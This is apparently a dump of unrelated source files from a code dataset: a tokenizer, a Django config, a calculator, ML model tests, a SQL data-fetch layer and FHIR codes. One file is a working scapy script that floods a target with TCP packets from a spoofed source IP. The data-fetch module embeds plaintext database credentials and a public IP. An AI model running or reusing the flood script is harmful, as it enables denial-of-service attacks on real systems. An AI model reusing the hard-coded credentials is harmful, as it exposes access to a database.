    def __init__(self, max_features=9997, min_df=10, lowercase=True, character=False):
        self.max_features = max_features
        self.min_df = min_df
        self.lowercase = lowercase
        self.character = character

    def fit(self, texts):
        """Learn the token -> id vocabulary from *texts*; returns self."""
        if self.lowercase:
            texts = [text.lower() for text in texts]
        if self.character:
            tokens = [list(text) for text in texts]
        else:
            tokens = [tokenize(text) for text in texts]
        # Three ids are reserved below, hence max_features-3 for real tokens.
        self.encoder = token_encoder(tokens, max_features=self.max_features-3, min_df=self.min_df)
        self.encoder['PAD'] = 0
        self.encoder['END'] = 1
        self.encoder['UNK'] = 2
        self.decoder = dict(zip(self.encoder.values(), self.encoder.keys()))
        self.n_features = len(self.encoder)
        return self

    def transform(self, texts):
        """Map each text to a list of token ids; unknown tokens become 2 (UNK)."""
        if self.lowercase:
            texts = [text.lower() for text in texts]
        if self.character:
            texts = [list(text) for text in texts]
        else:
            texts = [tokenize(text) for text in texts]
        tokens = [[self.encoder.get(token, 2) for token in text] for text in texts]
        return tokens

    def fit_transform(self, texts):
        """Convenience: fit on *texts*, then transform them."""
        self.fit(texts)
        tokens = self.transform(texts)
        return tokens

    def inverse_transform(self, codes):
        """Map id sequences back to text (characters joined directly, words by spaces)."""
        if self.character:
            joiner = ''
        else:
            joiner = ' '
        return [joiner.join([self.decoder[token] for token in code]) for code in codes]
class LenFilter(object):
    """Filters parallel datasets by the length of their first stream's sequences."""

    def __init__(self, max_len=1000, min_max_len=100, percentile=99):
        self.max_len = max_len
        self.percentile = percentile
        self.min_max_len = min_max_len

    def filter(self, *data):
        """Drop examples whose sequence in data[0] exceeds the length cutoff.

        When percentile > 0, the cutoff is that percentile of the observed
        lengths, clipped to [min_max_len, max_len]; otherwise max_len is
        used directly. All parallel streams are filtered with the same
        surviving indexes. Returns a single list for one stream, else a tuple.
        """
        lens = [len(seq) for seq in data[0]]
        if self.percentile > 0:
            max_len = np.percentile(lens, self.percentile)
            max_len = np.clip(max_len, self.min_max_len, self.max_len)
        else:
            max_len = self.max_len
        valid_idxs = [i for i, l in enumerate(lens) if l <= max_len]
        if len(data) == 1:
            return list_index(data[0], valid_idxs)
        else:
            return tuple([list_index(d, valid_idxs) for d in data])
| 30.894118 | 98 | 0.592917 | 3,074 | 0.5843 | 0 | 0 | 0 | 0 | 0 | 0 | 947 | 0.180004 |
636d48cb9b81c8aa18e1903f64ee3f997f6ae04e | 155 | py | Python | agendamentos/apps.py | afnmachado/univesp_pi_1 | e6f2b545faaf53d14d17f751d2fb32e6618885b7 | [
"MIT"
] | null | null | null | agendamentos/apps.py | afnmachado/univesp_pi_1 | e6f2b545faaf53d14d17f751d2fb32e6618885b7 | [
"MIT"
] | null | null | null | agendamentos/apps.py | afnmachado/univesp_pi_1 | e6f2b545faaf53d14d17f751d2fb32e6618885b7 | [
"MIT"
] | null | null | null | from django.apps import AppConfig
class AgendamentoConfig(AppConfig):
    """Django app configuration for the ``agendamentos`` (appointments) app."""

    # Use 64-bit auto-incrementing primary keys by default (Django 3.2+).
    default_auto_field = 'django.db.models.BigAutoField'
    name = 'agendamentos'
| 22.142857 | 56 | 0.774194 | 118 | 0.76129 | 0 | 0 | 0 | 0 | 0 | 0 | 45 | 0.290323 |
636de814ecdedb3663dd101d8eaad27c3d18f26b | 3,443 | py | Python | app/mods/calculator.py | MzB-Teaching/calculator | 2de5f554a6cfb4a5f4047c7779b29808563d99bb | [
"Unlicense"
] | null | null | null | app/mods/calculator.py | MzB-Teaching/calculator | 2de5f554a6cfb4a5f4047c7779b29808563d99bb | [
"Unlicense"
] | null | null | null | app/mods/calculator.py | MzB-Teaching/calculator | 2de5f554a6cfb4a5f4047c7779b29808563d99bb | [
"Unlicense"
] | null | null | null | #!/usr/bin/env python3
"""This is a simple python3 calculator for demonstration purposes
some to-do's but we'll get to that"""
__author__ = "Sebastian Meier zu Biesen"
__copyright__ = "2000-2019 by MzB Solutions"
__email__ = "smzb@mitos-kalandiel.me"
class Calculator(object):
    """A simple interactive four-function calculator.

    Operands are validated to be ints via the ``Num1``/``Num2`` property
    setters; the selected operation code (1=add, 2=subtract, 3=multiply,
    4=divide, 0=quit) drives :meth:`eval_operation`.
    """

    @property
    def isDebug(self):
        """Whether debug mode is enabled."""
        return self._isDebug

    @isDebug.setter
    def isDebug(self, bDebug):
        self._isDebug = bDebug

    @isDebug.deleter
    def isDebug(self):
        del self._isDebug

    @property
    def isInteractive(self):
        """Whether the calculator is running interactively."""
        return self._isInteractive

    @isInteractive.setter
    def isInteractive(self, bInteractive):
        self._isInteractive = bInteractive

    @isInteractive.deleter
    def isInteractive(self):
        del self._isInteractive

    @property
    def Operation(self):
        """Selected operation code (1-4, or 0 to quit)."""
        return self._Operation

    @Operation.setter
    def Operation(self, iOperation):
        self._Operation = iOperation

    @Operation.deleter
    def Operation(self):
        del self._Operation

    @property
    def Num1(self):
        """First operand (must be an int)."""
        return self._Num1

    @Num1.setter
    def Num1(self, iNum):
        if not isinstance(iNum, int):
            raise TypeError
        self._Num1 = iNum

    @Num1.deleter
    def Num1(self):
        del self._Num1

    @property
    def Num2(self):
        """Second operand (must be an int)."""
        return self._Num2

    @Num2.setter
    def Num2(self, iNum):
        if not isinstance(iNum, int):
            raise TypeError
        self._Num2 = iNum

    @Num2.deleter
    def Num2(self):
        del self._Num2

    def __init__(self):
        self._isDebug = False
        self._isInteractive = False
        self._Operation = None
        self._Num1 = None
        self._Num2 = None

    def add(self):
        """Return Num1 + Num2."""
        return self._Num1 + self._Num2

    def subtract(self):
        """Return Num1 - Num2."""
        return self._Num1 - self._Num2

    def multiply(self):
        """Return Num1 * Num2."""
        return self._Num1 * self._Num2

    def divide(self):
        """Return Num1 / Num2.

        Raises:
            ZeroDivisionError: if Num2 is 0.  The explicit guard resolves
                the old to-do about making division by zero impossible,
                while keeping the exception type callers already saw.
        """
        if self._Num2 == 0:
            raise ZeroDivisionError("division by zero: Num2 must not be 0")
        return self._Num1 / self._Num2

    def ask_op(self):
        """Prompt the user for an operation and return its integer code."""
        print("Please select operation -\n"
              "1. Add\n"
              "2. Subtract\n"
              "3. Multiply\n"
              "4. Divide\n")
        # Take input from the user
        result = input("Select operations from 1, 2, 3, 4 :")
        return int(result)

    def ask_number(self):
        """Prompt the user for an integer operand and return it."""
        num = int(input("Enter an operand: "))
        return num

    def eval_operation(self):
        """Dispatch on the selected operation code and print the result.

        Division by zero is reported as a message instead of crashing the
        interactive session.
        """
        if self._Operation == 1:
            print(self._Num1, "+", self._Num2, "=", self.add())
        elif self._Operation == 2:
            print(self._Num1, "-", self._Num2, "=", self.subtract())
        elif self._Operation == 3:
            print(self._Num1, "*", self._Num2, "=", self.multiply())
        elif self._Operation == 4:
            try:
                print(self._Num1, "/", self._Num2, "=", self.divide())
            except ZeroDivisionError:
                print("Cannot divide by zero")
        elif self._Operation == 0:
            return
        else:
            print("Invalid operation")
| 24.949275 | 65 | 0.577984 | 3,188 | 0.925937 | 0 | 0 | 1,175 | 0.341272 | 0 | 0 | 767 | 0.222771 |
636ec0c0514935bf57f2ac6d68a3f04a9e9ec222 | 1,001 | py | Python | tcp_syn_flood.py | r3k4t/tcp_syn_flood | b0ccf8199ea9253ad882afb505071e9d01693be8 | [
"MIT"
] | null | null | null | tcp_syn_flood.py | r3k4t/tcp_syn_flood | b0ccf8199ea9253ad882afb505071e9d01693be8 | [
"MIT"
] | null | null | null | tcp_syn_flood.py | r3k4t/tcp_syn_flood | b0ccf8199ea9253ad882afb505071e9d01693be8 | [
"MIT"
] | 1 | 2021-08-08T09:07:31.000Z | 2021-08-08T09:07:31.000Z | import os
import sys
import time
import pyfiglet
from scapy.all import*
# Clear the terminal and print a colored ASCII-art banner with author info.
os.system("clear")
print (chr(27)+"[36m")  # ANSI escape: switch text color to cyan
import pyfiglet  # NOTE(review): duplicate import — pyfiglet is already imported above
banner = pyfiglet.figlet_format("Tcp Syn Flood",font="slant")
print (banner)
print (chr(27)+"[33m")  # ANSI escape: yellow
print (" Author : Rahat Khan Tusar(RKT)")
print (" Github : https://github.com/r3k4t")
def synflood(src,tgt):
    """Send one TCP packet to tgt:1337 from every source port in 1024-65534.

    src: (possibly spoofed) source IP address; tgt: target IP address.
    NOTE(review): scapy's TCP layer defaults to the SYN flag, making these
    SYN packets — confirm against the scapy docs for the pinned version.
    """
    for sport in range(1024,65535):
        T3=IP(src=src,dst=tgt)           # IP layer with the given source/destination
        T4=TCP(sport=sport,dport=1337)   # TCP layer, varying source port each iteration
        pkt = T3/T4                      # stack layers into one packet
        send(pkt)                        # transmit at layer 3
# Gather source and target addresses from the user (colored prompts).
print (chr(27)+"[32m")  # green
src = input("Enter your source ip:")
print (chr(27)+"[31m")  # red
tgt = input("Enter your target ip:")
print (chr(27)+"[31m")
os.system("clear")
# Show an "Attacking" banner followed by a cosmetic three-step progress readout.
banner2 = pyfiglet.figlet_format("Attacking",font="standard")
print (banner2)
print (chr(27)+"[35m")  # magenta
time.sleep(4)
print ("Loading =====================> 0 % ")
time.sleep(4)
print ("Loading ==============> 50 % ")
time.sleep(4)
print ("Loading ========> 100 % ")
print (chr(27)+"[32m")
# Launch the flood (blocks until all ~64k packets are sent).
synflood(src,tgt)
| 16.966102 | 61 | 0.597403 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 335 | 0.334665 |
636ed44c67488a2bf87f694de36be6eb15ddd7e0 | 1,957 | py | Python | tests/test_models.py | lmacaya/oddt | bfbf9ea99768b556684dc99c6ac87a9f16b16f80 | [
"BSD-3-Clause"
] | 264 | 2015-02-20T11:11:51.000Z | 2022-03-28T06:44:00.000Z | tests/test_models.py | lmacaya/oddt | bfbf9ea99768b556684dc99c6ac87a9f16b16f80 | [
"BSD-3-Clause"
] | 106 | 2015-06-22T19:31:27.000Z | 2022-03-25T17:21:42.000Z | tests/test_models.py | lmacaya/oddt | bfbf9ea99768b556684dc99c6ac87a9f16b16f80 | [
"BSD-3-Clause"
] | 106 | 2015-06-23T22:10:55.000Z | 2022-01-21T05:02:32.000Z | import pickle
import numpy as np
from numpy.testing import assert_array_almost_equal, assert_array_equal
import pytest
from oddt.scoring.models import classifiers, regressors
@pytest.mark.filterwarnings('ignore:Stochastic Optimizer')
@pytest.mark.parametrize('cls',
                         [classifiers.svm(probability=True),
                          classifiers.neuralnetwork(random_state=42)])
def test_classifiers(cls):
    """Each classifier must perfectly separate a trivially separable toy set,
    expose consistent probability outputs, and survive a pickle round-trip."""
    # toy data: five points at (0, 0) labelled 1, five at (1, 1) labelled 0
    X = np.concatenate((np.zeros((5, 2)), np.ones((5, 2))))
    Y = np.concatenate((np.ones(5), np.zeros(5)))
    np.random.seed(42)  # seed before fit so results are reproducible
    cls.fit(X, Y)
    assert_array_equal(cls.predict(X), Y)
    assert cls.score(X, Y) == 1.0
    prob = cls.predict_proba(X)
    assert_array_almost_equal(prob, [[0, 1]] * 5 + [[1, 0]] * 5, decimal=1)
    # log-probabilities must agree with log of the probabilities
    log_prob = cls.predict_log_proba(X)
    assert_array_almost_equal(np.log(prob), log_prob)
    # serialization round-trip must preserve predicted probabilities
    pickled = pickle.dumps(cls)
    reloaded = pickle.loads(pickled)
    prob_reloaded = reloaded.predict_proba(X)
    assert_array_almost_equal(prob, prob_reloaded)
@pytest.mark.parametrize('reg',
                         [regressors.svm(C=10),
                          regressors.randomforest(random_state=42),
                          regressors.neuralnetwork(solver='lbfgs',
                                                   random_state=42,
                                                   hidden_layer_sizes=(20, 20)),
                          regressors.mlr()])
def test_regressors(reg):
    """Each regressor must fit two informative features to targets 0..9 within
    absolute error 1 and survive a pickle round-trip with identical output."""
    # two linearly decreasing features, targets are 0..9
    X = np.vstack((np.arange(30, 10, -2, dtype='float64'),
                   np.arange(100, 90, -1, dtype='float64'))).T
    Y = np.arange(10, dtype='float64')
    np.random.seed(42)  # seed before fit so results are reproducible
    reg.fit(X, Y)
    pred = reg.predict(X)
    assert (np.abs(pred.flatten() - Y) < 1).all()
    assert reg.score(X, Y) > 0.9
    # serialization round-trip must preserve predictions
    pickled = pickle.dumps(reg)
    reloaded = pickle.loads(pickled)
    pred_reloaded = reloaded.predict(X)
    assert_array_almost_equal(pred, pred_reloaded)
| 31.564516 | 80 | 0.599898 | 0 | 0 | 0 | 0 | 1,774 | 0.90649 | 0 | 0 | 83 | 0.042412 |
636f4efb035fdaa64cb9b8922b6256a38b910e41 | 9,570 | py | Python | data/fech_data.py | wangjiehui11235/panther | cf1ca2f0c7107c5cdacf2f7ff4002d43427d9b07 | [
"Apache-2.0"
] | 3 | 2020-01-23T22:23:08.000Z | 2020-10-12T20:02:16.000Z | data/fech_data.py | wangjiehui11235/panther | cf1ca2f0c7107c5cdacf2f7ff4002d43427d9b07 | [
"Apache-2.0"
] | 1 | 2019-10-28T05:53:08.000Z | 2019-10-28T05:53:08.000Z | data/fech_data.py | wangjiehui11235/panther | cf1ca2f0c7107c5cdacf2f7ff4002d43427d9b07 | [
"Apache-2.0"
] | 9 | 2019-08-21T07:48:32.000Z | 2020-04-04T09:17:54.000Z | # -*- coding: utf-8 -*-
import pdb, six, importlib
import pandas as pd
from PyFin.api import makeSchedule, BizDayConventions
from sqlalchemy import create_engine, select, and_, or_
from utilities.singleton import Singleton
import sys
sys.path.append('..')
import config
# Connection handle: process-wide singleton wrapping a SQLAlchemy engine.
@six.add_metaclass(Singleton)
class SQLEngine(object):
    """Singleton holder for a SQLAlchemy engine created from a database URL."""

    def __init__(self, url):
        self._engine = create_engine(url)

    def sql_engine(self):
        """Return the underlying SQLAlchemy engine."""
        return self._engine
class FetchEngine(object):
    """Base data-fetching engine bound to a named SQL database.

    Subclasses supply concrete connection URLs and table-specific helpers;
    :meth:`base` implements the shared date-window / rebalance-schedule query.
    """

    def __init__(self, name, url):
        self._name = name
        self._engine = SQLEngine(url)

    @classmethod
    def create_engine(cls, name):
        """Return the engine class registered under *name* ('rl' or 'dx').

        Raises:
            ValueError: for an unknown engine name.  (Previously the method
                silently returned ``None``, deferring the failure to the
                caller's instantiation site.)
        """
        if name == 'rl':
            return FetchRLEngine
        elif name == 'dx':
            return FetchDXEngine
        raise ValueError("unknown fetch engine name: {!r}".format(name))

    def base(self, table_name, begin_date, end_date, freq=None):
        """Read rows of *table_name* with trade_date in [begin_date, end_date].

        When *freq* is given, only rebalance dates from the SSE trading
        calendar (Preceding convention) are selected instead of the full
        window.  Returns a pandas DataFrame.
        """
        if freq is None:
            query = select([table_name]).where(
                and_(table_name.trade_date >= begin_date,
                     table_name.trade_date <= end_date, ))
        else:
            rebalance_dates = makeSchedule(begin_date, end_date, freq,
                                           'china.sse',
                                           BizDayConventions.Preceding)
            query = select([table_name]).where(
                table_name.trade_date.in_(rebalance_dates))
        return pd.read_sql(query, self._engine.sql_engine())
class FetchRLEngine(FetchEngine):
    """Fetch engine for the 'rl' MySQL database (market, index, industry and
    factor data).  Query results are returned as pandas DataFrames; the
    surrogate ``id`` column is dropped where present."""

    def __init__(self):
        # Build the MySQL connection URL from config credentials.
        self._db_url = '''mysql+mysqlconnector://{0}:{1}@{2}:{3}/{4}'''.format(
            config.rl_db_user,
            config.rl_db_pwd,
            config.rl_db_host,
            config.rl_db_port,
            config.rl_db_database)
        super(FetchRLEngine, self).__init__('rl', self._db_url)

    def market(self, begin_date, end_date, freq=None):
        """All market rows in the date window (see FetchEngine.base)."""
        table = importlib.import_module('data.rl_model').Market
        return self.base(table, begin_date, end_date, freq)

    def market_code(self, sets, begin_date, end_date, freq=None):
        """Market rows restricted to the security codes in *sets*.

        With *freq*, only SSE rebalance dates in the window are queried.
        """
        table = importlib.import_module('data.rl_model').Market
        if freq is None:
            query = select([table]).where(
                and_(table.trade_date >= begin_date, table.trade_date <= end_date,
                     table.security_code.in_(sets)))
        else:
            rebalance_dates = makeSchedule(begin_date, end_date, freq, 'china.sse', BizDayConventions.Preceding)
            query = select([table]).where(and_(table.trade_date.in_(rebalance_dates),
                                               table.security_code.in_(sets)))
        return pd.read_sql(query, self._engine.sql_engine()).drop(['id'], axis=1)

    def index_market(self, benchmark, begin_date, end_date, freq=None):
        """Index market rows for the benchmark security codes in the window."""
        table = importlib.import_module('data.rl_model').IndexMarket
        if freq is None:
            query = select([table]).where(
                and_(table.trade_date >= begin_date, table.trade_date <= end_date,
                     table.security_code.in_(benchmark)))
        else:
            rebalance_dates = makeSchedule(begin_date, end_date, freq, 'china.sse', BizDayConventions.Preceding)
            query = select([table]).where(
                and_(table.trade_date.in_(rebalance_dates), table.security_code.in_(benchmark)))
        return pd.read_sql(query, self._engine.sql_engine()).drop(['id'], axis=1)

    def exposure(self, begin_date, end_date, freq=None):
        """Factor-exposure rows in the date window."""
        table = importlib.import_module('data.rl_model').Exposure
        return self.base(table, begin_date, end_date, freq)

    def index(self, benchmark, begin_date, end_date, freq=None):
        """Index constituent rows for the benchmark index symbols."""
        table = importlib.import_module('data.rl_model').Index
        if freq is None:
            query = select([table]).where(
                and_(table.trade_date >= begin_date, table.trade_date <= end_date,
                     table.isymbol.in_(benchmark)))
        else:
            rebalance_dates = makeSchedule(begin_date, end_date, freq, 'china.sse', BizDayConventions.Preceding)
            query = select([table]).where(and_(table.trade_date.in_(rebalance_dates),
                                               table.isymbol.in_(benchmark)))
        return pd.read_sql(query, self._engine.sql_engine()).drop(['id'], axis=1)

    def industry(self, industry, begin_date, end_date, freq=None):
        """Industry membership rows (date, industry symbol/name, member symbol)."""
        table = importlib.import_module('data.rl_model').Industry
        if freq is None:
            query = select([table.trade_date, table.isymbol,
                            table.symbol, table.iname]).where(
                and_(table.trade_date >= begin_date, table.trade_date <= end_date,
                     table.isymbol.in_(industry)))
        else:
            rebalance_dates = makeSchedule(begin_date, end_date, freq, 'china.sse', BizDayConventions.Preceding)
            query = select([table.trade_date, table.isymbol,
                            table.symbol, table.iname]).where(and_(
                table.trade_date.in_(rebalance_dates),
                table.isymbol.in_(industry)))
        return pd.read_sql(query, self._engine.sql_engine())

    def security(self, symbol_sets):
        """Map the given symbols to internal security codes."""
        table = importlib.import_module('data.rl_model').GLInternalCode
        query = select([table.security_code, table.symbol]).where(
            and_(table.symbol.in_(symbol_sets)))
        return pd.read_sql(query, self._engine.sql_engine())

    def factor(self, factor_category, begin_date, end_date, factor_name=None, freq=None):
        """Factor values for a factor-model table named *factor_category*.

        When *factor_name* (a list of column names) is given, only those
        columns plus the key columns are selected; otherwise all columns.
        """
        if factor_name is None:
            table = importlib.import_module('data.factor_model').__getattribute__(factor_category)
            return self.base(table, begin_date, end_date, freq)
        else:
            table = importlib.import_module('data.factor_model').__getattribute__(factor_category)
            # Always include the key columns alongside the requested factors.
            key_sets = ['id', 'security_code', 'trade_date'] + factor_name
            db_columns = []
            for key in key_sets:
                db_columns.append(table.__dict__[key])
            if freq is None:
                query = select(db_columns).where(
                    and_(table.trade_date >= begin_date, table.trade_date <= end_date, ))
            else:
                rebalance_dates = makeSchedule(begin_date, end_date, freq, 'china.sse', BizDayConventions.Preceding)
                query = select(db_columns).where(table.trade_date.in_(rebalance_dates))
            return pd.read_sql(query, self._engine.sql_engine()).drop(['id'], axis=1)
class FetchDXEngine(FetchEngine):
    """Fetch engine for the 'dx' PostgreSQL database.

    NOTE(review): the connection URL embeds hard-coded credentials and a
    public IP address; consider moving them into config like FetchRLEngine.
    """

    def __init__(self):
        super(FetchDXEngine, self).__init__('dx', 'postgresql+psycopg2://alpha:alpha@180.166.26.82:8889/alpha')

    def market(self, begin_date, end_date, freq=None):
        """Market rows in the date window (see FetchEngine.base)."""
        table = importlib.import_module('data.dx_model').Market
        return self.base(table, begin_date, end_date, freq)

    def exposure(self, begin_date, end_date, freq=None):
        """Factor-exposure rows in the date window."""
        table = importlib.import_module('data.dx_model').Exposure
        return self.base(table, begin_date, end_date, freq)
class EngineFactory():
    """Base factory: instantiates a fetch-engine class and declares the
    ``result`` interface that concrete factories implement."""

    def create_engine(self, engine_class):
        """Instantiate and return the given engine class."""
        instance = engine_class()
        return instance

    def result(self, begin_date, end_date):
        """Fetch data for the window; concrete factories must override this."""
        raise NotImplementedError
class MarketFactory(EngineFactory):
    """Factory exposing the wrapped engine's market-data queries."""

    def __init__(self, engine_class):
        self._fetch_engine = self.create_engine(engine_class)

    def result(self, begin_date, end_date, freq=None):
        """All market rows in the date window."""
        return self._fetch_engine.market(begin_date, end_date, freq)

    def result_code(self, sets, begin_date, end_date, freq=None):
        """Market rows restricted to the given security codes."""
        return self._fetch_engine.market_code(sets, begin_date, end_date, freq)
class ExposureFactory(EngineFactory):
    """Factory exposing the wrapped engine's factor-exposure queries."""

    def __init__(self, engine_class):
        self._fetch_engine = self.create_engine(engine_class)

    def result(self, begin_date, end_date, freq=None):
        """Exposure rows in the date window."""
        return self._fetch_engine.exposure(begin_date, end_date, freq)
class IndexFactory(EngineFactory):
    """Factory exposing the wrapped engine's index-constituent queries."""

    def __init__(self, engine_class):
        self._fetch_engine = self.create_engine(engine_class)

    def result(self, benchmark, begin_date, end_date, freq=None):
        """Index rows for the benchmark symbols in the date window."""
        return self._fetch_engine.index(benchmark, begin_date, end_date, freq)
class IndustryFactory(EngineFactory):
    """Factory exposing the wrapped engine's industry-membership queries."""

    def __init__(self, engine_class):
        self._fetch_engine = self.create_engine(engine_class)

    def result(self, benchmark, begin_date, end_date, freq=None):
        """Industry membership rows for the given industry symbols."""
        return self._fetch_engine.industry(benchmark, begin_date, end_date, freq)
class FactorFactory(EngineFactory):
    """Factory exposing the wrapped engine's factor-value queries."""

    def __init__(self, engine_class):
        self._fetch_engine = self.create_engine(engine_class)

    def result(self, factor_category, begin_date, end_date, factor_name=None, freq=None):
        """Factor values, optionally restricted to the named factor columns."""
        return self._fetch_engine.factor(factor_category, begin_date, end_date, factor_name, freq)
class SecurityFactory(EngineFactory):
    """Factory exposing the wrapped engine's symbol-to-code mapping."""

    def __init__(self, engine_class):
        self._fetch_engine = self.create_engine(engine_class)

    def result(self, symbol_sets):
        """Security-code rows for the given symbols."""
        return self._fetch_engine.security(symbol_sets)
class IndexMarketFactory(EngineFactory):
    """Factory exposing the wrapped engine's index-market queries."""

    def __init__(self, engine_class):
        self._fetch_engine = self.create_engine(engine_class)

    def result(self, benchmark, begin_date, end_date, freq=None):
        """Index market rows for the benchmark codes in the date window."""
        return self._fetch_engine.index_market(benchmark, begin_date, end_date, freq)
if __name__ == "__main__":
    # Smoke test: fetch one month of factor-exposure data via the DX engine.
    # Renamed the local from the misleading ``market_factory`` — the object
    # constructed here is an ExposureFactory, not a MarketFactory.
    exposure_factory = ExposureFactory(FetchDXEngine)
    begin_date = '2018-12-01'
    end_date = '2018-12-31'
    print(exposure_factory.result(begin_date, end_date))
| 42.914798 | 116 | 0.646186 | 9,032 | 0.942994 | 0 | 0 | 344 | 0.035916 | 0 | 0 | 485 | 0.050637 |
636fae94296d077704f838d5bc8a253de68b535f | 549 | py | Python | models/collaborator.py | phil-lopreiato/frc-notebook-server | 35e79dbcca45f0257a138ca2834b0b6e57b814f1 | [
"MIT"
] | null | null | null | models/collaborator.py | phil-lopreiato/frc-notebook-server | 35e79dbcca45f0257a138ca2834b0b6e57b814f1 | [
"MIT"
] | null | null | null | models/collaborator.py | phil-lopreiato/frc-notebook-server | 35e79dbcca45f0257a138ca2834b0b6e57b814f1 | [
"MIT"
] | null | null | null | from google.appengine.ext import ndb
class Collaborator(ndb.Model):
    """
    Represents collab relationship at events
    Notifications will only be sent if both the
    sender and receiver have shared with each other
    """
    # User who initiated the share.
    srcUserId = ndb.StringProperty(required=True)
    # User the share was sent to.
    dstUserId = ndb.StringProperty(required=True)
    # True once both sides have shared with each other.
    mutual = ndb.BooleanProperty(default=False)
    # Event this collaboration applies to.
    eventKey = ndb.StringProperty(required=True)
    # Set once on creation.
    created = ndb.DateTimeProperty(auto_now_add=True)
    # Refreshed on every put (auto_now); excluded from datastore indexes.
    updated = ndb.DateTimeProperty(auto_now=True, indexed=False)
| 30.5 | 64 | 0.744991 | 509 | 0.92714 | 0 | 0 | 0 | 0 | 0 | 0 | 156 | 0.284153 |
6371f69bd422691fe8339fc5e5157ce5b0079115 | 327 | py | Python | genomics_geek/graphql/mixins.py | genomics-geek/genomics-geek.com | ba24be4a0e3d569859a5378d4e7054d58c88728e | [
"MIT"
] | null | null | null | genomics_geek/graphql/mixins.py | genomics-geek/genomics-geek.com | ba24be4a0e3d569859a5378d4e7054d58c88728e | [
"MIT"
] | 2 | 2018-10-15T20:37:03.000Z | 2018-10-15T20:37:21.000Z | earsie_eats_blog/graphql/mixins.py | genomics-geek/earsie-eats.com | b2d1e6626daa44b5e03198bdc9362758803fd3ee | [
"MIT"
] | 1 | 2019-05-16T03:54:21.000Z | 2019-05-16T03:54:21.000Z | from graphene import Int
from .decorators import require_authenication
class PrimaryKeyMixin(object):
    """Graphene mixin exposing the model's primary key as an Int field ``pk``."""
    pk = Int(source='pk')
class LoginRequiredMixin(object):
    """Graphene node mixin that requires authentication for ``get_node``."""

    @classmethod
    @require_authenication(info_position=1)  # `info` is the second positional argument
    def get_node(cls, info, id):
        """Resolve the node only after the decorator has verified authentication."""
        return super(LoginRequiredMixin, cls).get_node(info, id)
| 20.4375 | 64 | 0.740061 | 249 | 0.761468 | 0 | 0 | 154 | 0.470948 | 0 | 0 | 4 | 0.012232 |
637274d6c48599470c2d5a70eb69d9b7d03629a5 | 1,237 | py | Python | oops_fhir/r4/code_system/flag_priority_codes.py | Mikuana/oops_fhir | 77963315d123756b7d21ae881f433778096a1d25 | [
"MIT"
] | null | null | null | oops_fhir/r4/code_system/flag_priority_codes.py | Mikuana/oops_fhir | 77963315d123756b7d21ae881f433778096a1d25 | [
"MIT"
] | null | null | null | oops_fhir/r4/code_system/flag_priority_codes.py | Mikuana/oops_fhir | 77963315d123756b7d21ae881f433778096a1d25 | [
"MIT"
] | null | null | null | from pathlib import Path
from fhir.resources.codesystem import CodeSystem
from oops_fhir.utils import CodeSystemConcept
__all__ = ["FlagPriorityCodes"]
_resource = CodeSystem.parse_file(Path(__file__).with_suffix(".json"))
class FlagPriorityCodes:
    """
    Flag Priority Codes
    This value set is provided as an exemplar. The value set is driven by
    IHE Table B.8-4: Abnormal Flags, Alert Priority.
    Status: draft - Version: 4.0.1
    Copyright None
    http://hl7.org/fhir/flag-priority-code
    """

    # One CodeSystemConcept per priority code (PN, PL, PM, PH).
    pn = CodeSystemConcept(
        {"code": "PN", "definition": "No alarm.", "display": "No alarm"}
    )
    """
    No alarm
    No alarm.
    """

    pl = CodeSystemConcept(
        {"code": "PL", "definition": "Low priority.", "display": "Low priority"}
    )
    """
    Low priority
    Low priority.
    """

    pm = CodeSystemConcept(
        {"code": "PM", "definition": "Medium priority.", "display": "Medium priority"}
    )
    """
    Medium priority
    Medium priority.
    """

    ph = CodeSystemConcept(
        {"code": "PH", "definition": "High priority.", "display": "High priority"}
    )
    """
    High priority
    High priority.
    """

    class Meta:
        # The CodeSystem resource parsed from the sibling .json at import time.
        resource = _resource
| 19.030769 | 86 | 0.606306 | 1,006 | 0.813258 | 0 | 0 | 0 | 0 | 0 | 0 | 713 | 0.576395 |
63740319cbdd9993b7493ee891f9371a9c6e02c1 | 256 | py | Python | components/collector/src/source_collectors/sonarqube/duplicated_lines.py | kargaranamir/quality-time | 1c427c61bee9d31c3526f0a01be2218a7e167c23 | [
"Apache-2.0"
] | 33 | 2016-01-20T07:35:48.000Z | 2022-03-14T09:20:51.000Z | components/collector/src/source_collectors/sonarqube/duplicated_lines.py | kargaranamir/quality-time | 1c427c61bee9d31c3526f0a01be2218a7e167c23 | [
"Apache-2.0"
] | 2,410 | 2016-01-22T18:13:01.000Z | 2022-03-31T16:57:34.000Z | components/collector/src/source_collectors/sonarqube/duplicated_lines.py | kargaranamir/quality-time | 1c427c61bee9d31c3526f0a01be2218a7e167c23 | [
"Apache-2.0"
] | 21 | 2016-01-16T11:49:23.000Z | 2022-01-14T21:53:22.000Z | """SonarQube duplicated lines collector."""
from .base import SonarQubeMetricsBaseClass
class SonarQubeDuplicatedLines(SonarQubeMetricsBaseClass):
    """SonarQube duplicated lines collector."""

    # SonarQube metric keys: duplicated-line count (value) and total lines.
    valueKey = "duplicated_lines"
    totalKey = "lines"
| 23.272727 | 58 | 0.765625 | 164 | 0.640625 | 0 | 0 | 0 | 0 | 0 | 0 | 111 | 0.433594 |
63763ebb1e4d5814f4a75ddf0793dd74b59fa669 | 370 | py | Python | myapp/migrations/0002_studentmodel_dob.py | RajapandiR/Student | b0da4a04394381fda52f75234f6347c43958454a | [
"MIT"
] | null | null | null | myapp/migrations/0002_studentmodel_dob.py | RajapandiR/Student | b0da4a04394381fda52f75234f6347c43958454a | [
"MIT"
] | null | null | null | myapp/migrations/0002_studentmodel_dob.py | RajapandiR/Student | b0da4a04394381fda52f75234f6347c43958454a | [
"MIT"
] | null | null | null | # Generated by Django 3.2.9 on 2021-11-23 16:24
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: add a nullable DOB date field to StudentModel."""

    dependencies = [
        ('myapp', '0001_initial'),
    ]

    operations = [
        migrations.AddField(
            model_name='studentmodel',
            name='DOB',
            field=models.DateField(null=True),
        ),
    ]
| 19.473684 | 47 | 0.581081 | 277 | 0.748649 | 0 | 0 | 0 | 0 | 0 | 0 | 87 | 0.235135 |
63783927c365abff6927c69ef8abf31d89e8cbab | 6,159 | py | Python | sl_cutscenes/camera.py | AIS-Bonn/sl-cutscenes | d50128b86a9c808cbe5943e737a4974f0a8d3982 | [
"MIT"
] | 2 | 2022-03-25T08:24:10.000Z | 2022-03-29T09:06:47.000Z | sl_cutscenes/camera.py | AIS-Bonn/sl-scenes | d50128b86a9c808cbe5943e737a4974f0a8d3982 | [
"MIT"
